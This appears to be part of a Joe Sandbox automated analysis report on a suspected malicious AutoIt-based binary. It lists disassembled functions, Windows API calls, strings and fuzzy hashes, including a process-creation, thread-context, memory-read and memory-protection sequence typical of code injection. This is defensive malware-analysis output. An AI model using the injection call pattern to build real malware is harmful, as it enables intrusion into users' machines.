Function 003B53A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 003B8B28: __getptd_noexit.LIBCMT ref: 003B8B28

__lock_file.LIBCMT ref: 003B53EB

Part of subcall function 003B6C11: __lock.LIBCMT ref: 003B6C34

__fclose_nolock.LIBCMT ref: 003B53F6

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: f6dde5ae0c94528fb40db0b65ddfa2723293e16d8b384054b7eaeb93d128973f
Instruction ID: 85daca783335ccc79698977d2901ba5c26d57866d55aff05423a72f79b370ff0
Opcode Fuzzy Hash: f6dde5ae0c94528fb40db0b65ddfa2723293e16d8b384054b7eaeb93d128973f
Instruction Fuzzy Hash: 66F0BB31900A049ADB23AF7598067ED7BE46F4137DF258109E628AFEC1CFFC89419B51

Function 01316CCD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 0131748B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01317521
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01317543

Memory Dump Source

Source File: 00000000.00000002.1394800227.0000000001315000.00000040.00000020.00020000.00000000.sdmp, Offset: 01315000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1315000_5by4QM3v89.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 282d440d23347d33a5333bc70feb3b77e7ffa06fe9f8fdc76eda24defaf3804a
Instruction ID: c11be901399e136a2e234da6110a304972cf14d83b991528f198d517b6232bf3
Opcode Fuzzy Hash: 282d440d23347d33a5333bc70feb3b77e7ffa06fe9f8fdc76eda24defaf3804a
Instruction Fuzzy Hash: DC12BD24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A

Function 003B0C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 003B0CB7

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 27c015dbf9e032d06435ddc0728dbd23130556e0de64d5464d45f63a4810acea
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: B931D670A001099BC71EDF58C4849AAFBA6FB59304B6587A5E90ACFB51DB31EDC1DBC0

Function 003CFCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 003CFCB7

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 59466f5ed7da0b1947242bd96a11573070f4c6b5f8563d198786446faec54a09
Instruction ID: 6dea65918ebbad3643ea363439e296e7c9875a68fb4282a8488a45ad975c2864
Opcode Fuzzy Hash: 59466f5ed7da0b1947242bd96a11573070f4c6b5f8563d198786446faec54a09
Instruction Fuzzy Hash: 1441F5745087418FDB16DF18C458B1ABBE1BF45318F0A89ACE99A8B762C731EC45CF92

Function 00397B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00397BB3

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: df9979208df031f35904bd776eb44f0db3df839bcd71914adf39e13b52e99f65
Instruction ID: a8093dc78a336b70531b6cdd055121d60cb0d512fd4ae1f502b5d3c11a633516
Opcode Fuzzy Hash: df9979208df031f35904bd776eb44f0db3df839bcd71914adf39e13b52e99f65
Instruction Fuzzy Hash: 4A212472614A08EBDF168F15E841BAE7BB8FB14350F21842DE446C9590EB309990D705

Function 0039784B Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00397899

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: debd4a192cd98d234165f3013593147144481ea24bfc443804d127757904428b
Instruction ID: 1161fd944ead3b3e0978b22b57b2ce548261ce861b61128a7d7353987b959147
Opcode Fuzzy Hash: debd4a192cd98d234165f3013593147144481ea24bfc443804d127757904428b
Instruction Fuzzy Hash: 7D11A231618216ABDB16DF28C886C6EB7A9EF85324725811AE919CB3D1DB32EC11C790

Function 00394DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00394BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00394BEF

Part of subcall function 003B525B: __wfsopen.LIBCMT ref: 003B5266

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004552F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00394E0F

Part of subcall function 00394B6A: FreeLibrary.KERNEL32(00000000), ref: 00394BA4

Part of subcall function 00394C70: _memmove.LIBCMT ref: 00394CBA

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: b7a6665e0346e69fca43c2b2ff3f94e73d7d34fb7dd64881f6fb584f0a9a1b9c
Instruction ID: fc23fadb40a9b1bfc5ff5e3398abf75f3ef62a5a60c330194e3477cfd95a351c
Opcode Fuzzy Hash: b7a6665e0346e69fca43c2b2ff3f94e73d7d34fb7dd64881f6fb584f0a9a1b9c
Instruction Fuzzy Hash: 8711E331A00306ABCF16BF70DC12FAD77A8AF44710F10882DF642AF181DA719E069B51

Function 003CFD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 003CFD91

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 1dc5770e54ce052129ef38778823599f408f7f56eec8ea88b44a002210f1193f
Instruction ID: 6ce8c370f6d2cf2f1a71c6a2ad791cbee5839196eec71806c0690e7bf123cec4
Opcode Fuzzy Hash: 1dc5770e54ce052129ef38778823599f408f7f56eec8ea88b44a002210f1193f
Instruction Fuzzy Hash: 8E211574908701DFCB1ADF64C454B5ABBE1BF84314F05896CE98A9B722D731E805CB92

Function 003B4863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 003B48A6

Part of subcall function 003B8B28: __getptd_noexit.LIBCMT ref: 003B8B28

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 580975f94ecedc29cc28d472852ff18b9849fd57801a794c8f80df151269d713
Instruction ID: 7cbe0b349ef6e4f71dee7b6c816ddedde6194cf451bbe58ca04e05ab397b3003
Opcode Fuzzy Hash: 580975f94ecedc29cc28d472852ff18b9849fd57801a794c8f80df151269d713
Instruction Fuzzy Hash: 92F0AF31900609ABEF13AFB48C067EE36A5AF0032DF158418F624DE992CB79C951DB55

Function 00394E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,004552F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00394E7E

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 2cfc68063a7aebdc45f6a109a2c4b94f3de6d19c5161350727f83ceec56252c4
Instruction ID: 94c2dd9dd3c8f5eec2e3d8a04b1118f4fbd84133046f990b61e1c4a3bf07cda7
Opcode Fuzzy Hash: 2cfc68063a7aebdc45f6a109a2c4b94f3de6d19c5161350727f83ceec56252c4
Instruction Fuzzy Hash: C2F03975901711CFCF369F68E494C56BBE5BF143293218A3EE2DA82A20C7329886DF40

Function 003B0791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003B07B0

Part of subcall function 00397BCC: _memmove.LIBCMT ref: 00397C06

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 083515576d15c9bbe3af117d9ef89b01efa20ae0a5095bbf75f5b9453fd7902a
Instruction ID: 6e8af3f9a6ed3d73f5839fe0ffd05ddf869fa2fefcbf6ffe6025ec2f5e11a8b0
Opcode Fuzzy Hash: 083515576d15c9bbe3af117d9ef89b01efa20ae0a5095bbf75f5b9453fd7902a
Instruction Fuzzy Hash: 3DE0863690422857C72196589C05FEA779DDB896A0F0441B5FC08D7245D9719C8086D0

Function 003B525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 003B5266

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 9647da0dbae9dcaec1ac58e49c3bc8fe947a78922bdf8586096939d706b7f987
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: F6B0927644020C77CE022A82EC02B893B299B41768F408020FB0C1C562A673AA649A89

Function 01317CCC Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 01317CE1

Memory Dump Source

Source File: 00000000.00000002.1394800227.0000000001315000.00000040.00000020.00020000.00000000.sdmp, Offset: 01315000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1315000_5by4QM3v89.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: d9f2646dc3760818bcc63c19932a194a98bd633b505323e1e1291ae5f41041ff
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 99E0BF7494010EEFDB10EFA4DA496DE7BB4EF04301F1005A1FD05D7685DB309E558A62

Function 01317CD0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 01317CE1

Memory Dump Source

Source File: 00000000.00000002.1394800227.0000000001315000.00000040.00000020.00020000.00000000.sdmp, Offset: 01315000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1315000_5by4QM3v89.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: abe55e528f270010c8ab0f74097faaebe0531f6e24fe1f6158523ce182c39575
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: AFE0E67494010EDFDB00EFB4DA4969E7FB4EF04301F100161FD01D2285DA309D508A62

Non-executed Functions

Function 0041CABC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00392612: GetWindowLongW.USER32(?,000000EB), ref: 00392623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0041CB37
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0041CB95
GetWindowLongW.USER32(?,000000F0), ref: 0041CBD6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0041CC00
SendMessageW.USER32 ref: 0041CC29
_wcsncpy.LIBCMT ref: 0041CC95
GetKeyState.USER32(00000011), ref: 0041CCB6
GetKeyState.USER32(00000009), ref: 0041CCC3
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0041CCD9
GetKeyState.USER32(00000010), ref: 0041CCE3
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0041CD0C
SendMessageW.USER32 ref: 0041CD33
SendMessageW.USER32(?,00001030,?,0041B348), ref: 0041CE37
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0041CE4D
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0041CE60
SetCapture.USER32(?), ref: 0041CE69
ClientToScreen.USER32(?,?), ref: 0041CECE
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0041CEDB
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0041CEF5
ReleaseCapture.USER32 ref: 0041CF00
GetCursorPos.USER32(?), ref: 0041CF3A
ScreenToClient.USER32(?,?), ref: 0041CF47
SendMessageW.USER32(?,00001012,00000000,?), ref: 0041CFA3
SendMessageW.USER32 ref: 0041CFD1
SendMessageW.USER32(?,00001111,00000000,?), ref: 0041D00E
SendMessageW.USER32 ref: 0041D03D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0041D05E
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0041D06D
GetCursorPos.USER32(?), ref: 0041D08D
ScreenToClient.USER32(?,?), ref: 0041D09A
GetParent.USER32(?), ref: 0041D0BA
SendMessageW.USER32(?,00001012,00000000,?), ref: 0041D123
SendMessageW.USER32 ref: 0041D154
ClientToScreen.USER32(?,?), ref: 0041D1B2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0041D1E2
SendMessageW.USER32(?,00001111,00000000,?), ref: 0041D20C
SendMessageW.USER32 ref: 0041D22F
ClientToScreen.USER32(?,?), ref: 0041D281
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0041D2B5

Part of subcall function 003925DB: GetWindowLongW.USER32(?,000000EB), ref: 003925EC

GetWindowLongW.USER32(?,000000F0), ref: 0041D351

Strings

pbE, xrefs: 0041CEAF
@GUI_DRAGID, xrefs: 0041CE9C
F, xrefs: 0041D235

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F$pbE
API String ID: 3977979337-81612502
Opcode ID: 9781838effd481f7af9f3d414cd97bec1d5dcfa75fe7c0d705b15f16ec162585
Instruction ID: f5ea5a71f6979ce32b65a0cd2661640b2e84b33ba7eddb3b3dfdc82864000cd2
Opcode Fuzzy Hash: 9781838effd481f7af9f3d414cd97bec1d5dcfa75fe7c0d705b15f16ec162585
Instruction Fuzzy Hash: 2942CA74608340AFCB21CF28DC84AAABBE5FF49310F14492AF555C73A1C735E895DB9A

Function 003A6F9E Relevance: 55.8, APIs: 19, Strings: 10, Instructions: 5018COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 003A71C3
_memset.LIBCMT ref: 003A7539
_memmove.LIBCMT ref: 003A76AC

Strings

P\D, xrefs: 003E1AB8
[:<:]], xrefs: 003A7479
DEFINE, xrefs: 003E2103
[:>:]], xrefs: 003A7492
\b(?<=\w), xrefs: 003E3773
Q\E, xrefs: 003A7FCB
\b(?=\w), xrefs: 003E3769
_:, xrefs: 003E23CB
3c:, xrefs: 003E23A0
]D, xrefs: 003E1A22

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: _memmove$_memset
String ID: ]D$3c:$DEFINE$P\D$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_:
API String ID: 1357608183-1634533736
Opcode ID: 873cd39fcfac8df612cd332d1f1aca514223b5f5664e3805938ef9ad7922d667
Instruction ID: 1b98fb838263c2ad6f20cf9cf273dd1ee0b0afcf67df168708d83a09b9a3a6ca
Opcode Fuzzy Hash: 873cd39fcfac8df612cd332d1f1aca514223b5f5664e3805938ef9ad7922d667
Instruction Fuzzy Hash: 3793B275E00269DBDF26CF59C881BADB7B5FF48310F25826AE945AB2C1E7709D81CB40

Function 003948D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 003948DF
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003CD665
IsIconic.USER32(?), ref: 003CD66E
ShowWindow.USER32(?,00000009), ref: 003CD67B
SetForegroundWindow.USER32(?), ref: 003CD685
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 003CD69B
GetCurrentThreadId.KERNEL32 ref: 003CD6A2
GetWindowThreadProcessId.USER32(?,00000000), ref: 003CD6AE
AttachThreadInput.USER32(?,00000000,00000001), ref: 003CD6BF
AttachThreadInput.USER32(?,00000000,00000001), ref: 003CD6C7
AttachThreadInput.USER32(00000000,?,00000001), ref: 003CD6CF
SetForegroundWindow.USER32(?), ref: 003CD6D2
MapVirtualKeyW.USER32(00000012,00000000), ref: 003CD6E7
keybd_event.USER32(00000012,00000000), ref: 003CD6F2
MapVirtualKeyW.USER32(00000012,00000000), ref: 003CD6FC
keybd_event.USER32(00000012,00000000), ref: 003CD701
MapVirtualKeyW.USER32(00000012,00000000), ref: 003CD70A
keybd_event.USER32(00000012,00000000), ref: 003CD70F
MapVirtualKeyW.USER32(00000012,00000000), ref: 003CD719
keybd_event.USER32(00000012,00000000), ref: 003CD71E
SetForegroundWindow.USER32(?), ref: 003CD721
AttachThreadInput.USER32(?,?,00000000), ref: 003CD748

Strings

Shell_TrayWnd, xrefs: 003CD660

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 007971f52067a02c428a98a73854044489c81cc6132d4332087d1b40a99fb606
Instruction ID: a27d32ecad01a3b9fe15c72ba4c5cbd3d4ffb1521c842d880200d3fafbb0451e
Opcode Fuzzy Hash: 007971f52067a02c428a98a73854044489c81cc6132d4332087d1b40a99fb606
Instruction Fuzzy Hash: EE318571A40318BBEB216F619C49FBF7F6DEB44B50F118039FA04EA1D1D6B05D12ABA4

Function 003FC75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 003FC78D
FindClose.KERNEL32(00000000), ref: 003FC7E1
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003FC806
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003FC81D
FileTimeToSystemTime.KERNEL32(?,?), ref: 003FC844
__swprintf.LIBCMT ref: 003FC890
__swprintf.LIBCMT ref: 003FC8D3

Part of subcall function 00397DE1: _memmove.LIBCMT ref: 00397E22

__swprintf.LIBCMT ref: 003FC927

Part of subcall function 003B3698: __woutput_l.LIBCMT ref: 003B36F1

__swprintf.LIBCMT ref: 003FC975

Part of subcall function 003B3698: __flsbuf.LIBCMT ref: 003B3713
Part of subcall function 003B3698: __flsbuf.LIBCMT ref: 003B372B

__swprintf.LIBCMT ref: 003FC9C4
__swprintf.LIBCMT ref: 003FCA13
__swprintf.LIBCMT ref: 003FCA62

Strings

%4d, xrefs: 003FC8CD
%4d%02d%02d%02d%02d%02d, xrefs: 003FC88A
%02d, xrefs: 003FC91B, 003FC925, 003FC973, 003FC9C2, 003FCA11, 003FCA60

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
